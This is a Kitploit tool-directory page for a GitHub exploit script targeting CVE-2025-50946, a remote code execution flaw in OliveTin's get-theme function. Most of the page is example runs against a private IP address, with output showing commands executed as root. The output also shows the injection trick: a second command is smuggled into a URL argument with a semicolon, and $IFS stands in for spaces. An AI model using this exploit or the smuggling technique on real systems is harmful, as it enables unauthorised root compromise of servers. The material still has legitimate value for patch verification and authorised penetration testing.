Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve-2025-50946 — Exploit script for CVE-2025-50946 | Kitploit
Tools/GitHubGitHub/runt1me/cve-2025-50946
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubrunt1me/cve-2025-50946

cve-2025-50946

Exploit script for CVE-2025-50946

View Repository
2 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

cve-2025-50946

Exploit script for CVE-2025-50946 (OliveTin get-theme RCE). The character requirements are finnicky and many commands that include multiple arguments may not be executed properly. I haven't taken the time to run down the root cause or try to make the script more robust. Holler at me or open a PR if you need something.

Credit to chrisWalker11 for the original research that I based this script on: link

Example Usage

Basic PoC:

root@kitploit:~
python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "id"
[*] Target: http://192.168.141.194:1337
[*] Payload: id
[*] Sending payload... 
uid=0(root) gid=0(root) groups=0(root)

Process List (showing only a snippet of the output):

root@kitploit:~
 python cve-2025-50946.py -t http://192.168.141.194 -p 1337 --command "ps -efH"
[*] Target: http://192.168.141.194:1337
[*] Payload: ps$IFS-efH
[*] Sending payload... 
UID          PID    PPID  C STIME TTY          TIME CMD
root           2       0  0 09:20 ?        00:00:00 [kthreadd]
root           1       0  0 09:20 ?        00:00:01 /sbin/init
root         313       1  0 09:20 ?        00:00:00   /usr/lib/systemd/systemd-journald
root         738       1  0 09:20 ?        00:00:00   /usr/sbin/cron -f -P
root         749       1  0 09:20 ?        00:00:00   /usr/local/bin/OliveTin
root        2167     749  0 13:26 ?        00:00:00     sh -c olivetin-get-theme http://t;ps$IFS-efH 
root        2168    2167  0 13:26 ?        00:00:00       ps -efH
Download Tool